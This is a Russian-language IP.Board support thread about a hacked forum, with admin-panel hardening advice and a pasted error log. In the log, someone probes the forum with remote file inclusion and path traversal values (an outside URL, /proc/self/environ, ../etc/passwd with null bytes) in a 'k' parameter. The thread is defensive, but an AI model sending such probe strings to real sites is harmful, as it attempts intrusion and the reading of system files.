Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
Morty

Хакнули форум v3.1.4

Рекомендованные сообщения

Помогите пожалуйста защитится от хакинга.

Сосбтвенно адрес _http://help-icq.ru

Поделиться сообщением


Ссылка на сообщение

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

Поделиться сообщением


Ссылка на сообщение

Помогите пожалуйста защитится от хакинга.

Использовать нормальный хостинг.

Не использовать нуленные программы. Если в непонятно откуда скачанных DLE или в IP.Board - е уже предусмотрен черный ход, то не защитится уже не чем.

Хуки скачивать только с официальных сайтов. Взломов через хуки еще не видел, но возможность вполне вероятная.

Ну естественно следить за обновлением используемых официальных программ.

 

И все.

 

Сломать нормальный пропаченный IP.Board очень сложно.

Поделиться сообщением


Ссылка на сообщение

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

Можно подробнее про .htpasswd?

Поделиться сообщением


Ссылка на сообщение

Можно подробнее про .htpasswd

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

Поделиться сообщением


Ссылка на сообщение

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

Вродебы там всё намного проще.

Я сейчас посмотрел логи входа в админку.

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

Поделиться сообщением


Ссылка на сообщение

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Узнать пароль к htpasswd так же можно.

 

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

Это ложное ощущение безопасности. Но лишняя защита не когда не бывает лишней.

 

Хотя проще, ограничить по минимуму количество людей с доступом в АЦ.

Пароль должен быть реально сложный.

У админа "логин" и "отображаемое имя" никогда не должны совпадать.

 

Я не использую htpasswd.

 

Так как мой акк был удалён, а его нет.

А смысл его при взломе, было оставлять? Чтобы восстановить было проще?

Поделиться сообщением


Ссылка на сообщение

Всем спасибо.

Тему можно закрыть.

Поделиться сообщением


Ссылка на сообщение

Тема может пригодиться другим. Любая тема, где есть полезные советы.

Поделиться сообщением


Ссылка на сообщение

Я ведь не сказал "тему можно удалить".

Тема ведь останется. А если у кого-то будет похожий вопрос то создаст новую...

Поделиться сообщением


Ссылка на сообщение

И еще раз писать то же самое. Добрые ...

Поделиться сообщением


Ссылка на сообщение

Самое неприятное в любом взломе - это не факт самого взлома, а неизвестность:

- Кто и как именно взломал?

- Какой уровень доступа получил?

- С какой целью?

- Что именно и в каком количестве сделано?

- Не оставлено ли закладок "на будущее"?

 

Не найдя точные достоверные ответы, нельзя гарантировать, что взлом не повторится вновь. Если хотя бы на один из вопросов ответа нет - проводить полный аудит безопасности всего и вся, долго и основательно.

 

С сабжевого форума поржал.

Поделиться сообщением


Ссылка на сообщение

проводить полный аудит безопасности

Смысл? Если с самого начала была высокая вероятность закладки.

Поделиться сообщением


Ссылка на сообщение

А я и не про этот форум пишу. Топикстартер тут и не появится более, скорее всего, он же свою проблему "решил". А там у него - да, конечно, проверять смысла нет. Судя по всему, пиратская говносборка какого-то очередного "хакера", изначально напичканная левыми модами и правками. Да и сам форум такой форум - такая тематика, такой контент. В одной из тех с половиной тем, кажется, сам админ выкладывает т.н. "пинч" - генератор трояна, ворующего cookies, причем выкладывает в бинарном виде. Думаю, вы все понимаете и относительно форума, и относительно методики "взлома"? Тут и "закаладки" не нужны, с такими админами))

Поделиться сообщением


Ссылка на сообщение

День добрый. Сегодня ночью посыпались ошибки следующего вида. Кто-то очень хотел найти какую-то уязвимость или что-то еще? Что за параметр "k"? Кто может прокомментировать? Спасибо.

 

Выдержки из лога. Всего было 108 строк. Полный лог во вложении.

 

 

log_id log_member log_date log_error log_error_code log_ip_address log_request_uri

18 0 1301948884 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

19 0 1301948886 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

20 0 1301948886 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

21 0 1301948888 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ

22 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

23 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

24 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

25 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

26 0 1301948890 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ%00

27 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ

28 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

29 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

30 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

31 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ%00

32 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=/proc/self/environ

33 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=28&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

 

...

 

123 0 1301948950 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd

124 0 1301948952 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=../../../../../../../../../../etc/passwd%00

125 0 1301948954 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd%00

error_logs.rar

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...